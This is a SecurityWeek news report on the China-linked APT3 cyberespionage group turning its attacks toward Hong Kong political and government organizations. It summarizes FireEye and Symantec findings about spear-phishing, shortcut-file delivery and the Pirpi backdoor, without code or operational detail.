Connect with us

Hi, what are you looking for?


Malware & Threats

China-Linked APT3 Group Focuses Attacks on Hong Kong

A China-linked cyberespionage group has shifted its attention from the United States to Hong Kong, where it has targeted more than a dozen organizations over the past year.

A China-linked cyberespionage group has shifted its attention from the United States to Hong Kong, where it has targeted more than a dozen organizations over the past year.

FireEye reported last week that APT3, a threat actor believed to be sponsored by China, had targeted two Hong Kong government agencies in early August. The attackers had used spear-phishing emails to trick recipients into installing what the security firm said was a previously unseen piece of malware.

APT3, also known as UPS Team, Gothic Panda, Buckeye and TG-0110, has been active since at least 2009. The group’s attacks often involved zero-day vulnerabilities and flaws that had just been patched.

Many of the group’s earlier attacks focused on the United States, including government organizations. However, Symantec, which tracks the threat actor as Buckeye, noticed last year that the hackers had become increasingly interested in Hong Kong.

Symantec observed roughly 82 APT3 victims since the beginning of 2015, but experts pointed out that the group had cast a wide net and only 17 of these organizations were persistently targeted. The list of victims included 13 organizations in Hong Kong, three in the U.S. and one in the U.K.

While there were some periods last year when all three countries had been targeted, researchers noticed that the U.K. and the U.S. were no longer attacked starting with March 2016.

In the recent attacks observed by Symantec, mostly aimed at political entities in Hong Kong, APT3 used ZIP archives and Windows shortcut (.lnk) files to deliver a backdoor dubbed by the security firm Pirpi.

Advertisement. Scroll to continue reading.

The infection method appears to be the same in the attacks observed by FireEye – a ZIP archive contains a shortcut file that downloads malware. However, the early August attacks spotted by FireEye did not leverage Pirpi, which has been around since 2010 and which the company tracks as Backdoor.APT.CookieCutter. Instead, the security firm said they involved a new malware tool.

This suggests that China may have stepped up its attacks just before the Hong Kong legislative elections that took place on September 4. The Chinese government has been increasingly concerned about Hong Kong’s push for more political independence.

In addition to Pirpi, Symantec observed APT3 using various other tools, including keyloggers, remote command execution tools, system information harvesting tools, and browser password stealers. Researchers said the group appears to be focusing on file and print servers, which suggests they are mainly interested in stealing documents.

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join security experts as they discuss ZTNA’s untapped potential to both reduce cyber risk and empower the business.


Join Microsoft and Finite State for a webinar that will introduce a new strategy for securing the software supply chain.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Malware & Threats

Threat actors are increasingly abusing Microsoft OneNote documents to deliver malware in both targeted and spray-and-pray campaigns.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.


The recent ransomware attack targeting Rackspace was conducted by a cybercrime group named Play using a new exploitation method, the cloud company revealed this...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Malware & Threats

A vulnerability affecting IBM’s Aspera Faspex file transfer solution, tracked as CVE-2022-47986, has been exploited in attacks.